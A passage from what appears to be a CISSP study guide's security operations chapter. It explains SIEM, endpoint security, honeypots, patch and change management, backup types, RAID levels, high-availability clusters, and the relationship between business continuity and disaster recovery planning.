efficiently correlate data from multiple sources. 

The Security Information and Event Management (SIEM) is the primary tool 
used to ease the correlation of data across disparate sources. Correlation of security 
relevant data is the primary utility provided by the SIEM. The goal of data correla- 
tion is to better understand the context to arrive at a greater understanding of risk 
within the organization due to activities being noted across various security plat- 
forms. While SIEMs typically come with some built-in alerts that look for particular 
correlated data, custom correlation rules can typically be created to augment the 
built-in capabilities. 

To be able to successfully gain intelligence through the correlation of data neces- 
sarily implies access to multiple data sources. While the threat detection use case 
of a SIEM can be viable, the collection of data required for correlation can be vast. 
Due to the volume of data being consolidated in most SIEMs, there are often use 
cases for the SIEM associated with more easily or better demonstrating regulatory 
compliance. 


CONTINUOUS MONITORING 

The threat, vulnerability, and asset landscapes change constantly. Organizations his- 
torically have been most attuned to security during quarterly scans, annual audits, 
or even ad hoc reviews. While routine checkups are worthwhile, the 24x7 nature of 
the adversaries remains. One goal of continuous monitoring is to migrate to think- 
ing about assessing and reassessing an organization’s security posture as an ongoing 
process. 

Beyond the general concept of continuous monitoring, there are also specific 
manifestations of continuous monitoring that should be called out individually. 
The most notable references to continuous monitoring come from the United States 
government. Under this purview, continuous monitoring is specifically offered as 
a modem improvement upon the legacy Certification and Accreditation approach 
associated with documenting, approving, and reevaluating a system’s configuration 
every 3 years. 


DATA LOSS PREVENTION 

As prominent and high volume data breaches continue unabated, the desire for 
solutions designed to address data loss has grown. Data Loss Prevention (DLP) are 
a class of solutions that are tasked specifically with trying to detect or, preferably, 
prevent data from leaving an organization in an unauthorized manner. The approaches 
to DLP vary greatly. One common approach employs network-oriented tools that 
attempt to detect and/or prevent sensitive data being exfiltrated in cleartext. This 
approach does little to address the potential for data exfiltration over an encrypted 
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channel. Often, to deal with the potential for encrypted exfiltration typically requires 
endpoint solutions to provide visibility prior to encryption. 

ENDPOINT SECURITY 

While most organizations have long employed perimeter firewalls, Intrusion 
Detection Systems (IDS), and numerous other network-centric preventive and 
detective countermeasures, defense in depth mandates that additional protective 
layers be employed. When the firewall, IDS, Web Content Filter, and others are 
bypassed an endpoint can be compromised. 

Because endpoints are the targets of attacks, preventive and detective capabilities 
on the endpoints themselves provide a layer beyond network-centric security devices. 
Modern endpoint security suites often encompass myriad products beyond simple 
antivirus software. These suites can increase the depth of security countermeasures 
well beyond the gateway or network perimeter. 

Though defense in depth is a laudable goal on its own, endpoint security suites 
provide significant advantages to the modern organization beyond simply greater 
depth of security. These tools can aid the security posture of devices even when they 
venture beyond the organization’s perimeter, whether that is because the device has 
physically moved or because the user has connected the internal device to a Wi-Fi 
or cellular network. An additional benefit offered by endpoint security products is 
their ability to provide preventive and detective control even when communications 
are encrypted all the way to the endpoint in question. Typical challenges associated 
with endpoint security are associated with volume considerations: vast number of 
products/systems must be managed; significant data must be analyzed and poten- 
tially retained. 

Many point products can be considered part of an overall endpoint security suite. 
The most important are antivirus, application whitelisting, removable media con- 
trols, disk encryption. Host Intrusion Prevention Systems, and desktop firewalls. 


NOTE 

For details on Host Intrusion Detection Systems (HIDS) and Host Intrusion Prevention Systems 
(HIPS), please see HIDS and HIPS section above. For details regarding desktop firewalls please 
review the Firewalls section above. 


Antivirus 

The most commonly deployed endpoint security product is antivirus software. Many 
of the full endpoint security suites evolved over time from an initial offering of 
antivirus. Antivirus products are often derided for their continued inability to stop 
the spread of malware. However, most arguments against antivirus seem to bemoan 
the fact that these products alone are not sufficient to stop malware. Unfortunately, 
there is no silver bullet or magic elixir to stop malware, and until there is, antivirus or 
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antimalware products will continue to be necessary, though not sufficient. Antivirus 
is one layer (of many) of endpoint security defense in depth. 

Although antivirus vendors often employ heuristic or statistical methods for mal- 
ware detection, the predominant means of detecting malware is still signature based. 
Signature-based approaches require that a malware specimen is available to the anti- 
virus vendor for the creation of a signature. This is an example of application black- 
listing (see Application Whitelisting section below). For rapidly changing malware 
or malware that has not been previously encountered, signature based detection is 
much less successful. 

Application Whitelisting 

Application Whitelisting is a more recent addition to endpoint security suites. The 
primary focus of application whitelisting is to determine in advance which binaries 
are considered safe to execute on a given system. Once this baseline has been estab- 
lished, any binary attempting to run that is not on the list of known-good binaries 
is prevented from executing. A weakness of this approach is when a “known good” 
binary is exploited by an attacker, and used maliciously. 

Whitelisting techniques include allowing binaries to run that: 

• Are signed via a trusted code signing digital certificate 

• Match a known good cryptographic hash 

• Have a trusted full path and name 

The last approach is the weakest: an attacker can replace a trusted binary with a 
malicious version. 

Application whitelisting is superior to application blacklisting (where known bad 
binaries are banned). 

Removable Media Controls 

Another recent endpoint security product to find its way into large suites assists with 
removable media control. The need for better controlling removable media has been 
felt on two fronts in particular. First, malware infected removable media inserted 
into an organization’s computers has been a method for compromising otherwise 
reasonably secure organizations. Second, the volume of storage that can be contained 
in something the size of a fingernail is astoundingly large, and has been used to 
surreptitiously exfiltrate sensitive data. 

A common vector for malware propagation is the AutoRun feature of many 
recent Microsoft operating systems. If a properly-formatted removable drive (or CD/ 
DVD) is inserted into a Microsoft Windows operating system that supports AutoRun, 
any program referenced by the “AUTORUN. INF” file in the root directory of the 
media will execute automatically. Many forms of malware will write a malicious 
AUTORUN. INF file to the root directory of all drives, attempting to spread virally if 
and when the drive is removed and connected to another system. 

It is best practice to disable AutoRun on Microsoft operating systems. See 
the Microsoft article “How to disable the AutoRun functionality in Windows” 
(http://support.microsoft.com/kb/967715) for information on disabling AutoRun. 
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Primarily due to these issues, organizations have been compelled to exert stricter 
control over what type of removable media may be connected to devices. Removable 
media control products are the technical control that matches administrative controls 
such as policy mandates against unauthorized use of removable media. 

Disk Encryption 

Another endpoint security product found with increasing regularity is disk encryp- 
tion software. Organizations have often been mandating the use of whole disk 
encryption products that help to prevent the compromise of any sensitive data on 
hard disks that fall into unauthorized hands, especially on mobile devices, which 
have a greater risk of being stolen. 

Full Disk Encryption (FDE), also called Whole Disk Encryption, encrypts an 
entire disk. This is superior to partially encrypted solutions, such as encrypted 
volumes, directories, folders or files. The problem with the latter approach is the risk 
of leaving sensitive data on an unencrypted area of the disk. Dragging and dropping 
a file from an unencrypted to encrypted directory may leave unencrypted data as 
unallocated data, for example. 


HONEYPOTS 

A honeypot is a system designed to attract attackers. This allows information security 
researchers and network defenders to better analyze network-based attacks. Honey- 
pots have no production value beyond research. 

Internal honeypots can provide high-value warnings of internal malware or 
attackers. While an internet-facing honeypot will be frequently compromised, internal 
honeypots should never become compromised. If this happens, it usually means that 
other preventive and detective controls, such as firewalls and IDSs, have failed. 

Low-interaction honeypots simulate systems (or portions of systems), usually 
by scripting network actions (such as simulating network services by displaying 
banners). High-interaction honeypots run actual operating systems, in hardware or 
virtualized. 

Consult with legal staff before deploying a honeypot. There are legal and practi- 
cal risks posed by honeypots: what if an attacker compromises a honeypot, and then 
successfully penetrates further into a production network? Could the attackers argue 
they were “invited” into the honeypot, and by extension the production network? 
What if an attacker penetrates a honeypot and then successfully uses it as a base to 
attack a third party? These risks should be considered before deploying a honeypot. 


HONEYNETS 

A honey net is a (real or simulated) network of honeypots. Traditional honeypots 
focus on offering instrumented decoy services or a single system. Honeynets involve 
an entire network of systems and services that lack any legitimate devices. As with 
the intent of the standard honeypot, the goal of a honeynet is to allow the organization 
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to discover adversary activity. Honeynets can include a honeywall (honeynet fire- 
wall) that is intended to limit the likelihood of the honeynet being used to attack 
other systems. 


ASSET MANAGEMENT 

A holistic approach to operational information security requires organizations to fo- 
cus on systems as well as the people, data, and media. Systems security is another vi- 
tal component to operational security, and there are specific controls that can greatly 
help system security throughout the system’s lifecycle. 


CONFIGURATION MANAGEMENT 

One of the most important components of any systems security work is the develop- 
ment of a consistent system security configuration that can be leveraged throughout 
the organization. The goal is to move beyond the default system configuration to one 
that is both hardened and meets the operational requirements of the organization. 
One of the best ways to protect an environment against future zero-day attacks (at- 
tacks against vulnerabilities with no patch or fix) is to have a hardened system that 
only provides the functionality strictly required by the organization. 

Development of a security-oriented baseline configuration is a time consuming 
process due to the significant amount of research and testing involved. However, 
once an organizational security baseline is adopted, then the benefits of having a 
known, hardened, consistent configuration will greatly increase system security for 
an extended period of time. Further, organizations do not need to start from scratch 
with their security baseline development, as different entities provide guidance on 
baseline security. These predefined baseline security configurations might come 
from the vendor who created the device or software, government agencies, or also the 
nonprofit Center for Internet Security (see: http://www.cisecurity.org/). Basic con- 
figuration management practices associated with system security will involve tasks 
such as: disabling unnecessary services, removing extraneous programs, enabling 
security capabilities such as firewalls, antivirus, and intrusion detection or prevention 
systems, and the configuration of security and audit logs. 

Baselining 

Standardizing on a security configuration is certainly important, but there is an 
additional consideration with respect to security baselines. Security baselining 
is the process of capturing a point in time understanding of the current system 
security configuration. Establishing an easy means for capturing the current 
system security configuration can be extremely helpful in responding to a potential 
security incident. Assuming that the system or device in question was built from 
a standardized security baseline, and also that strong change control measures 
are adhered to, then there would be little need to capture the current security 
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configuration. However, in the real world, unauthorized changes can and will 
occur in even the most strictly controlled environment, which necessitates the 
monitoring of a system’s security configuration over time. Further, even authorized 
system modifications that adhere to the change management procedures need to be 
understood and easily captured. Another reason to emphasize continual baselining 
is because there may be systems that were not originally built to an initial security 
baseline. A common mistake that organizations make regarding system security 
is focusing on establishing a strong system security configuration, but failing to 
quickly and easily appreciate the changes to a system’s security configuration 
over time. 

Patch Management 

One of the most basic, yet still rather difficult, tasks associated with maintaining 
strong system security configuration is patch management, the process of 
managing software updates. All software has flaws or shortcomings that are not 
fully addressed in advance of being released. The common approach to fixing 
software is by applying patches to address known issues. Not all patches are 
concerned with security; many are associated with simple non security-related 
bug fixes. However, security patches do represent a significant piece of the 
overall patch pie. Software vendors announce patches both publicly and directly 
to their customers. Once notified of a patch, organizations need to evaluate the 
patch from a risk management perspective to determine how aggressively 
the patch will need to be deployed. Testing is typically required to determine 
whether any adverse outcomes are likely to result from the patch installation. From 
a timeline standpoint, testing often occurs concomitantly with the risk evaluation. 
Installation is the final phase of the patch management process, assuming adverse 
effects do not require remediation. 

While the process of installing a single patch from a single vendor on a single 
system might not seem that onerous, managing the identification, testing, and 
installation of security patches from dozens of vendors across thousands of systems 
can become extremely cumbersome. Also, the degree to which patch installations 
can be centrally deployed or automated varies quite a bit amongst vendors. A 
relatively recent change in the threat landscape has made patch management even 
more difficult; attackers increasingly are focused on targeting clients rather than 
server based systems. With attackers emphasizing client side applications such 
as browsers (and their associated plugins, extensions, and frameworks), office 
suites, and PDF readers, the patch management landscape is rapidly growing in 
complexity. 

Vulnerability Management 

Security patches are typically intended to eliminate a known vulnerability. 
Organizations are constantly patching desktops, servers, network devices, telephony 
devices and other information systems. The likelihood of an organization having 
fully patched every system is low. While un-patched systems may be known, it is 
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also common to have systems with failed patches. The most common cause of failed 
patches is failing to reboot after deploying a patch that requires one. 

It is also common to find systems requiring an unknown patch. Vulnerability 
scanning is a way to discover poor configurations and missing patches in an 
environment. While it might seem obvious, it bears mentioning that vulnerability- 
scanning devices are only capable of discovering the existence of known 
vulnerabilities. Though discovering missing patches is the most significant feature 
provided by vulnerability scanning devices or software, some are also capable of 
discovering vulnerabilities associated with poor configurations. 

The term vulnerability management is used rather than just vulnerability 
scanning to emphasize the need for management of the vulnerability information. 
Many organizations are initially a bit overzealous with their vulnerability scanning 
and want to continuously enumerate all vulnerabilities within the enterprise. There 
is limited value in simply listing thousands of vulnerabilities unless there is also a 
process that attends to the prioritization and remediation of these vulnerabilities. The 
remediation or mitigation of vulnerabilities should be prioritized based on both risk 
to the organization and ease of remediation procedures. 

Zero Day Vulnerabilities and Zero Day Exploits 

Organizations intend to patch vulnerabilities before an attacker exploits them. As 
patches are released, attackers begin trying to reverse engineer exploits for the now- 
known patched vulnerability. This process of developing an exploit to fit a patched 
vulnerability has been occurring for quite some time, but what is changing is the typi- 
cal time-to-development of an exploit. The average window of time between a patch 
being released and an associated exploit being made public is decreasing. Recent 
research even suggests that for some vulnerabilities, an exploit can be created within 
minutes based simply on the availability of the unpatched and patched program [8]. 

In addition to attackers reverse engineering security patches to develop exploits, 
it is also possible for an attacker to discover a vulnerability before the vendor has 
developed a patch, or has been made aware of the vulnerability either by internal or 
external security researchers. The term for a vulnerability being known before the 
existence of a patch is “zero day vulnerability”. Zero-day vulnerabilities, also com- 
monly written 0-day, are becoming increasingly important as attackers are becoming 
more skilled in discovery, and, more importantly, the discovery and disclosure of 
zero day vulnerabilities is being monetized. A zero-day exploit, rather than vulner- 
ability, refers to the existence of exploit code for a vulnerability that has yet to be 
patched. 


CHANGE MANAGEMENT 

As stated above, system, network, and application changes are required. A system that 
does not change will become less secure over time, as security updates and patches 
are not applied. In order to maintain consistent and known operational security, a 
regimented change management or change control process needs to be followed. 
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The purpose of the change control process is to understand, communicate, and docu- 
ment any changes with the primary goal of being able to understand, control, and 
avoid direct or indirect negative impact that the change might impose. The overall 
change management process has phases, the implementation of which will vary to 
some degree within each organization. Typically there is a change control board that 
oversees and coordinates the change control process. The change control board should 
not only include members of the Information Technology team, but also members 
from business units. 

The intended change must first be introduced or proposed to the change control 
board. The change control board then gathers and documents sufficient details about 
the change to attempt to understand the implications. The person or group propos- 
ing the change should attempt to supply information about any potential negative 
impacts that might result from the change, as well as any negative impacts that could 
result from not implementing the change. Ultimately, the decision to implement the 
change, and the timeliness of this implementation, will be driven by principles of risk 
and cost management. Therefore, details related to the organizational risk associated 
with both enacting or delaying the change must be brought to the attention of the 
change control board. Another risk-based consideration is whether or not the change 
can be easily reversed should unforeseen impacts be greater than anticipated. Many 
organizations will require a rollback plan, which is sometimes also known as a back- 
out plan. This plan will attempt to detail the procedures for reversing the change 
should that be deemed necessary. 

If the change control board finds that the change is warranted, then a schedule for 
testing and implementing the change will be agreed upon. The schedule should take 
into account other changes and projects impacting the organization and its resources. 
Associated with the scheduling of the change implementation is the notification pro- 
cess that informs all departments impacted by the change. The next phase of the 
change management process will involve the testing and subsequent implementation 
of the change. Once implemented, a report should be provided back to the change 
control board detailing the implementation, and whether or not the change was 
successfully implemented according to plan. 

Change management is not an exact science, nor is the prescribed approach a 
perfect fit for either all organizations or all changes. In addition to each organiza- 
tion having a slightly different take on the change management process, there will 
also likely be particular changes that warrant deviation from the organizational 
norm either because the change is more or less significant than typical changes. For 
instance, managing the change associated with a small patch could well be handled 
differently than a major service pack installation. Because of the variability of the 
change management process, specific named phases have not been offered in this 
section. However, the general flow of the change management process includes: 

• Identifying a change 

• Proposing a change 

• Assessing the risk associated with the change 
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• Testing the change 

• Scheduling the change 

• Notifying impacted parties of the change 

• Implementing the change 

• Reporting results of the change implementation 

All changes must be closely tracked and auditable. A detailed change record 
should be kept. Some changes can destabilize systems or cause other problems; 
change management auditing allows operations staff to investigate recent changes 
in the event of an outage or problem. Audit records also allow auditors to verify that 
change management policies and procedures have been followed. 


CONTINUITY OF OPERATIONS 

We will discuss some continuity concepts later in this chapter, in the Business Con- 
tinuity Planning (BCP) and Disaster Recovery Planning (DRP) section. This section 
will focus on more overtly operational concerns related to continuity. Needless to 
say, continuity of operations is principally concerned with the availability portion of 
the confidentiality, integrity and availability triad. 

SERVICE LEVEL AGREEMENTS (SLA) 

As organizations leverage service providers and hosted solutions to a greater extent, 
the continuity of operations consideration become critical in contract negotiation, 
known as service level agreements. Service level agreements have been important for 
some time, but they are becoming increasingly critical as organizations are increas- 
ingly choosing to have external entities perform critical services or host significant 
assets and applications. The goal of the service level agreement is to stipulate all 
expectations regarding the behavior of the department or organization that is respon- 
sible for providing services and the quality of the services provided. Often service 
level agreements will dictate what is considered acceptable regarding things such as 
bandwidth, time to delivery, response times, etc. 

Though availability is usually the most critical security consideration of a 
service level agreement, the consideration of other security aspects will increase 
as they become easier to quantify through better metrics. Further, as organizations 
increasingly leverage hosting service providers for more than just commoditized 
connectivity, the degree to which security is emphasized will increase. One 
important point to realize about service level agreements is that it is paramount 
that organizations negotiate all security terms of a service level agreement with 
their service provider prior to engaging with the company. Typically, if an 
organization wants a service provider to agree after the fact to specific terms of a 
service level agreement, then the organization will be required to pay an additional 
premium for the service. 
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NOTE 

The most obvious example of a trend toward increasingly critical information and services being 
hosted by a service provider is that of the growing popularity of cloud computing. Cloud computing 
allows for organizations to effectively rent computing speed, storage, and bandwidth from a service 
provider for the hosting of some of their infrastructure. Security and quality of service of these 
solutions constitutes an extremely important point of distinction between the service offerings and 
their associated costs. Though not overtly testable for the CISSP®, cloud computing is becoming an 
important concept for security professionals to appreciate. 


FAULT TOLERANCE 

In order for systems and solutions within an organization to be able to continually 
provide operational availability they must be implemented with fault tolerance in 
mind. Availability is not solely focused on system uptime requirements, but also 
requires that data be accessible in a timely fashion as well. Both system and data fault 
tolerance will be attended to within this section. 

Backup 

The most basic and obvious measure to increase system or data fault tolerance is to 
provide for recoverability in the event of a failure. Given a long enough timeframe, 
accidents, such as that in Figure 8.7, will happen. In order for data to be able to be 
recovered in case of a fault some form of backup or redundancy must be provided. 
Though magnetic tape media is quite an old technology, it is still the most common 



Source: http://commons.wikimedia. 0 rg/wiki/File:Backup_Backup_Bsckup_--_And_Test_Restores.jpg 
Photograph by: John Boston. Image used under Creative Commons Attribution 2.0 License 
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repository of backup data. The three basic types of backups are: full backup, incre- 
mental backup and differential backup. 

Full 

The full backup is the easiest to understand of the types of backup; it simply is a rep- 
lica of all allocated data on a hard disk. Full backups contain all of the allocated data 
on the hard disk, which makes them simple from a recovery standpoint in the event 
of a failure. Though the time and media necessary to recover are less for full backups 
than those approaches that employ other methods, the amount of media required to 
hold full backups is greater. Another downside of using only full backups is the time 
it takes to perform the backup itself. The time required to complete a backup must 
be within the backup window, which is the planned period of time in which backups 
are considered operationally acceptable. Because of the larger amount of media, and 
therefore cost of media, and the longer backup window requirements, full backups 
are often coupled with either incremental or differential backups to balance the time 
and media considerations. 

Incremental 

One alternative to exclusively relying upon full backups is to leverage incremental 
backups. Incremental backups only archive hies that have changed since the last 
backup of any kind was performed. Since fewer hies are backed up, the time to 
perform the incremental backup is greatly reduced. To understand the tape require- 
ments for recovery, consider an example backup schedule using tapes, with weekly 
full backups on Sunday night and daily incremental backups. 

Each Sunday, a full backup is performed. For Monday’s incremental backup, 
only those hies that have been changed since Sunday’s backup will be marked for 
backup. On Tuesday, those hies that have been changed since Monday’s incremen- 
tal backup will be marked for backup. Wednesday, Thursday, Friday, and Saturday 
would all simply perform a backup of those hies that had changed since the previous 
incremental backup. 

Given this schedule, if a data or disk failure occurs and there is a need for recov- 
ery, then the most recent full backup and each and every incremental backup since 
the full backup is required to initiate a recovery. Though the time to perform each 
incremental backup is extremely short, the downside is that a full restore can require 
quite a few tapes, especially if full backups are performed less frequently. Also, 
the odds of a failed restoration due to a tape integrity issue (such as broken tape) rise 
with each additional tape required. 

Differential 

Another approach to data backup is the differential backup method. While the 
incremental backup only archived those files that had changed since any backup, 
the differential method will back up any files that have been changed since the last 
full backup. The following is an example of a backup schedule using tapes, with 
weekly full backups on Sunday night and daily differential backups. 
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Each Sunday, a full backup is performed. For Monday’s differential backup, 
only those files that have been changed since Sunday’s backup will be archived. 
On Tuesday, again those files that have been changed since Sunday’s full backup, 
including those backed up with Monday’s differential, will be archived. Wednesday, 
Thursday, Friday, and Saturday would all simply archive all files that had changed 
since the previous full backup. 

Given this schedule, if a data or disk failure occurs and there is a need for 
recovery, then only the most recent full backup and most recent differential backup 
are required to initiate a full recovery. Though the time to perform each differential 
backup is shorter than a full backup, as more time passes since the last full backup 
the length of time to perform a differential backup will also increase. If much of the 
data being backed up regularly changes or the time between full backups is long, then 
the length of time for a backup might approach that of the full backup. 

Archive Bits 

Some file systems, such as Microsoft’s NTFS, support the archive bit. This bit is a file 
attribute used to determine whether a file has been archived since last modification. 
A full backup will archive all files (regardless of each individual file’s archive bit 
setting), and then reset all archive bits to 0 (indicating each file has been archived). 

As files are modified, the associated archive bits are set to 1 (indicating the file 
has changed, and needs to be archived). An incremental backup will archive each 
modified file and reset the archive bit to 0. A differential backup will archive each 
modified file and leave the archive bit set to 1 . 

Redundant Array of Inexpensive Disks (RAID) 

Even if only one full backup tape is needed for recovery of a system due to a hard 
disk failure, the time to recover a large amount of data can easily exceed the recovery 
time dictated by the organization. The goal of a Redundant Array of Inexpensive 
Disks (RAID) is to help mitigate the risk associated with hard disk failures. There are 
various RAID levels that consist of different approaches to disk array configurations. 
These differences in configuration have varying cost, in terms of both the number 
of disks required to achieve the configuration’s goals, and capabilities in terms of 
reliability and performance advantages. Table 8.1 provides a brief description of the 
various RAID levels that are most commonly used. 


Table 8.1 RAID Levels 


RAID Level 

Description 

RAID 0 

Striped Set 

RAID 1 

Mirrored Set 

RAID 3 

Byte Level Striping with Dedicated Parity 

RAID 4 

Block Level Striping with Dedicated Parity 

RAID 5 

Block Level Striping with Distributed Parity 

RAID 6 

Block Level Striping with Double Distributed Parity 
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Three critical RAID terms are: mirroring, striping and parity. 

• Mirroring is the most obvious and basic of the fundamental RAID concepts, 
and is simply used to achieve full data redundancy by writing the same data to 
multiple hard disks. Since mirrored data must be written to multiple disks the 
write times are slower (though caching by the RAID controller may mitigate 
this). However, there can be performance gains when reading mirrored data 
by simultaneously pulling data from multiple hard disks. Other than read and 
write performance considerations, a major cost associated with mirroring is 
disk usage; at least half of the drives are used for redundancy when mirroring is 
used. 

• Striping is a RAID concept that is focused on increasing the read and write 
performance by spreading data across multiple hard disks. With data being 
spread amongst multiple disk drives, reads and writes can be performed 

in parallel across multiple disks rather than serially on one disk. This 
parallelization provides a performance increase, but does not aid in data 
redundancy. 

• Parity is a means to achieve data redundancy without incurring the same degree 
of cost as that of mirroring in terms of disk usage and write performance. 


EXAM WARNING 


While the ability to quickly recover from a disk failure is the goal of RAID there are configurations 
that do not have reliability as a capability. For the exam, be sure to understand that not all RAID 
configurations provide additional reliability. 


RAID 0 - Striped Set 

As is suggested by the title, RAID 0 employs striping to increase the performance 
of read and writes. By itself, striping offers no data redundancy so RAID 0 is a poor 
choice if recovery of data is the reason for leveraging RAID. Figure 8.8 shows visu- 
ally what RAID 0 entails. 

RAID 1 - Mirrored Set 

This level of RAID is perhaps the simplest of all RAID levels to understand. RAID 
1 creates/writes an exact duplicate of all data to an additional disk. The write perfor- 
mance is decreased, though the read performance can see an increase. Disk cost is 
one of the most troubling aspects of this level of RAID, as at least half of all disks are 
dedicated to redundancy. Figure 8.9 shows RAID 1 visually. 

RAID 2 - Hamming Code 

RAID 2 is not considered commercially viable for hard disks and is not used. This 
level of RAID would require either 14 or 39 hard disks and a specially designed 
hardware controller, which makes RAID 2 incredibly cost prohibitive. RAID 2 is not 
likely to be tested. 
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RAID 0 



FIGURE 8.8 RAID 0 - Striped Set 


FIGURE 8.9 RAID 


RAID 1 



RAID 3 - Striped Set with Dedicated Parity (Byte Level) 

Striping is desirable due to the performance gains associated with spreading data 
across multiple disks. However, striping alone is not as desirable due to the lack of 
redundancy. With RAID 3, data, at the byte level, is striped across multiple disks, but 
an additional disk is leveraged for storage of parity information, which is used for 
recovery in the event of a failure. 

RAID 4 - Striped Set with Dedicated Parity (Block Level) 

RAID 4 provides the exact same configuration and functionality as that of RAID 3, 
but stripes data at the block, rather than byte, level. Like RAID 3, RAID 4 employs 
a dedicated parity drive. 

RAID 5 - Striped Set with Distributed Parity 

One of the most popular RAID configurations is that of RAID 5, Striped Set with Dis- 
tributed Parity. Again with RAID 5 there is a focus on striping for the performance 
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RAID 5 



FIGURE 8.10 RAID 5 - Striped Set with Distributed Parity 


increase it offers, and RAID 5 leverages block level striping. Like RAIDs 3 and 
4, RAID 5 writes parity information that is used for recovery purposes. However, 
unlike RAIDs 3 and 4, which require a dedicated disk for parity information, RAID 5 
distributes the parity information across multiple disks. One of the reasons for 
RAID 5’s popularity is that the disk cost for redundancy is lower than that of a Mir- 
rored set. Another important reason for this level’s popularity is the support for both 
hardware and software based implementations, which significantly reduces the bar- 
rier to entry for RAID configurations. RAID 5 allows for data recovery in the event 
that any one disk fails. Figure 8.10 provides a visual representation of RAID 5. 

RAID 6 - Striped Set with Dual Distributed Parity 

While RAID 5 accommodates the loss of any one drive in the array, RAID 6 can 
allow for the failure of two drives and still function. This redundancy is achieved by 
writing the same parity information to two different disks. 


NOTE 

There are many and varied RAID configurations that are simply combinations of the standard RAID 
levels. Nested RAID solutions are becoming increasingly common with larger arrays of disks that 
require a high degree of both reliability and speed. Some common nested RAID levels include 
RAID 0+1, 1+0, 5 + 0, 6 + 0, and (1 + 0) + 0, which are also commonly written as RAID 01, 10, 
50, 60, and 100, respectively. 


RAID 1 + 0 or RAID 10 

RAID 1 + 0 or RAID 10 is an example of what is known as nested RAID or multi- 
RAID, which simply means that one standard RAID level is encapsulated within 
another. With RAID 10, which is also commonly written as RAID 1 + 0 to explicitly 
indicate the nesting, the configuration is that of a striped set of mirrors. 
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System Redundancy 

Though redundancy and resiliency of data, provided by RAID and backup solutions, 
is important, further consideration needs to be given to the systems themselves that 
provide access to this redundant data. 

Redundant Hardware 

Many systems can provide internal hardware redundancy of components that are 
extremely prone to failure. The most common example of this in-built redundancy 
is systems or devices that have redundant onboard power in the event of a power 
supply failure. In addition to redundant power, it is also common to find redundant 
network interface cards (NICs), as well as redundant disk controllers. Sometimes 
systems simply have field replaceable modular versions of commonly failing com- 
ponents. Though physically replacing a power supply might increase downtime, 
having an inventory of spare modules to service the entire datacenter’s servers 
would be less expensive than having all servers configured with an installed redun- 
dant power supply. 

Redundant Systems 

Though quite a few fault-prone internal components can be configured to have redun- 
dancy built into systems, there is a limit to the internal redundancy. If system availability 
is extremely important, then it might be prudent to have entire systems available in the 
inventory to serve as a means to recover. While the time to recover might be greater, it 
is fairly common for organizations to have an SLA with their hardware manufacturers 
to be able to quickly procure replacement equipment in a timely fashion. If the recovery 
times are acceptable, then quick procurement options are likely to be far cheaper than 
having spare equipment on-hand for ad hoc system recovery. 

High Availability Clusters 

Some applications and systems are so critical that they have more stringent uptime 
requirements than can be met by standby redundant systems, or spare hardware. 
These systems and applications typically require what is commonly referred to as a 
high-availability (HA) or failover cluster. A high-availability cluster employs mul- 
tiple systems that are already installed, configured, and plugged in, such that if a 
failure causes one of the systems to fail then the other can be seamlessly leveraged to 
maintain the availability of the service or application being provided. 

The actual implementation details of a high-availability cluster can vary quite a 
lot, but there are a few basic considerations that need to be understood. The primary 
implementation consideration for high-availability clusters is whether each node 
of a HA cluster is actively processing data in advance of a failure. This is known 
as an active-active configuration, and is commonly referred to as load balancing. 
Having systems in an active-active, or load balancing, configuration is typically 
costlier than having the systems in an active-passive, or hot standby, configuration 
in which the backup systems only begin processing when a failure state is detected. 
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BCP AND DRP OVERVIEW AND PROCESS 

The terms and concepts associated with Business Continuity and Disaster Recovery 
Planning are very often misunderstood. Clear understanding of what is meant by both 
Business Continuity and Disaster Recovery Planning, as well as what they entail, is 
critical for the CISSP® candidate. In addition to understanding what constitutes each 
discipline, information security professionals should also have an understanding of 
the relationship between these two processes. 

Another critical element to understanding Business Continuity and Disaster 
Recovery Planning is analyzing the various types of potential disasters that threaten 
to impact an organization. In addition to appreciating the various types of disruptive 
events that could trigger a Disaster Recovery or Business Continuity response, it is 
important to be able to take into account the likelihood or occurrence associated with 
the types of disasters. 

Finally, this section will define the high-level phases of the Business Continuity 
and Disaster Recovery Planning processes. The goal for this section is to ensure a 
basic understanding of the overall approach and major phases prior to delving into 
the details of each phase that will occur in the next major section: developing a 
BCP/DRP. Disasters are an inevitable fact of life. Given a long enough operational 
existence, every organization will experience a significant disaster. A thorough, regi- 
mented, and ongoing process of continually reviewing the threats associated with 
disaster events, an organization’s vulnerabilities to those threats, and the likelihood 
of the risk being made manifest will allow an organization to appropriately mitigate 
the inherent risks of disaster. 


BUSINESS CONTINUITY PLANNING (BCP) 

Though many organizations will simply use the phrases Business Continuity Plan- 
ning or Disaster Recovery Planning interchangeably, they are two distinct disci- 
plines. Though both plans are essential to the effective management of disasters 
and other disruptive events, their goals are different. The overarching goal of a 
BCP is for ensuring that the business will continue to operate before, throughout, 
and after a disaster event is experienced. The focus of a BCP is on the business 
as a whole, and ensuring that those critical services that the business provides or 
critical functions that the business regularly performs can still be carried out both 
in the wake of a disruption as well as after the disruption has been weathered. In 
order to ensure that the critical business functions are still operable, the organiza- 
tion will need to take into account the common threats to their critical functions as 
well as any associated vulnerabilities that might make a significant disruption more 
likely. Business Continuity Planning provides a long-term strategy for ensuring the 
continued successful operation of an organization in spite of inevitable disruptive 
events and disasters. 
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DISASTER RECOVERY PLANNING (DRP) 

While Business Continuity Planning provides the long-term strategic business ori- 
ented plan for continued operation after a disruptive event, the Disaster Recovery 
Plan is more tactical in its approach. The DRP provides a short-term plan for dealing 
with specific disruptions. Mitigating a malware infection that shows risk of spreading 
to other systems is an example of a specific IT-oriented disruption that a DRP would 
address. The DRP focuses on efficiently attempting to mitigate the impact of a disas- 
ter and the immediate response and recovery of critical IT systems in the face of a 
significant disruptive event. Disaster Recovery Planning is considered tactical rather 
than strategic and provides a means for immediate response to disasters. The DRP 
does not focus on long-term business impact in the same fashion that a BCP does. 


EXAM WARNING 


As discussed in Chapter 4, Domain 3: Security Engineering, the most important objective for all 
controls is personnel safety. This is especially true for exam questions regarding Disaster Recovery 
Planning. 


RELATIONSHIP BETWEEN BCP AND DRP 

The Business Continuity Plan is an umbrella plan that includes multiple specific 
plans, most importantly the Disaster Recovery Plan. Though the focus of the BCP 
and DRP are distinct, with the former attending to the business as a whole, and 
the latter is information systems-centric, these two processes overlap. In modern 
organizations dependent on information systems, how could the goal of continu- 
ally providing business-critical services in spite of disasters be achieved without 
the tactical recovery plan offered by a DRP? These two plans, which have different 
scopes, are intertwined. The Disaster Recovery Plan serves as a subset of the overall 
Business Continuity Plan, because a BCP would be doomed to fail if it did not con- 
tain a tactical method for immediately dealing with disruption of information sys- 
tems. Figure 8.1 1, from NIST Special Publication 800-34, provides a visual means 
for understanding the interrelatedness of a BCP and a DRP, as well as Continuity of 
